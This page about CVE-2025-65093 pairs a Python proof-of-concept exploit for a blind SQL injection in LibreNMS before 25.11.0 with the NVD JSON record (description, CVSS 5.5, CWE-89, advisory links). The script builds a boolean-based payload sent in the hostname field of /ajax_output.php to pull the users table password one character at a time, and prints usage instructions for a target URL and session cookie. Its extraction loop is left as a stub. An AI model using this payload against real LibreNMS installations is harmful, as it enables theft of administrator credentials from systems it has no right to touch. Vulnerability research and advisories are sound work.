CVE-2025-65093

import requests import sys # CVE-2025-65093 PoC - Boolean-based Blind SQL Injection # Target: LibreNMS < 25.11.0 # Endpoint: /ajax_output.php def extract_char(url, session_cookie, position, char_ascii): """Extract a single character from database using boolean-based blind SQLi""" payload = f"' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT password from users limit 1),{position},1))={char_ascii}) THEN 1 ELSE 0 END)--" cookies = {'PHPSESSID': session_cookie} data = {'hostname': payload} try: response = requests.post(url, data=data, cookies=cookies, timeout=10) # Analyze response to determine if condition is true or false if 'expected_response_marker' in response.text: return True except: pass return False def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-65093.py <target_url> <session_cookie>") print("Example: python cve-2025-65093.py http://target.com/ajax_output.php 'abc123'") sys.exit(1) target_url = sys.argv[1] session_cookie = sys.argv[2] print("[*] CVE-2025-65093 - LibreNMS SQL Injection PoC") print(f"[*] Target: {target_url}") print("[*] Extracting admin password...") # Password extraction logic would go here print("[!] This PoC demonstrates the injection technique") print("[*] Modify payload and target based on your testing environment") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-65093", "sourceIdentifier": "[email protected]", "published": "2025-11-18T23:15:57.690", "lastModified": "2025-11-20T16:18:22.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a boolean-based blind SQL injection vulnerability was identified in the LibreNMS application at the /ajax_output.php endpoint. The hostname parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses. This issue has been patched in version 25.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.11.0", "matchCriteriaId": "BB2997C4-F47F-4823-8E14-6FBC84E84C74"}]}]}], "references": [{"url": "https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}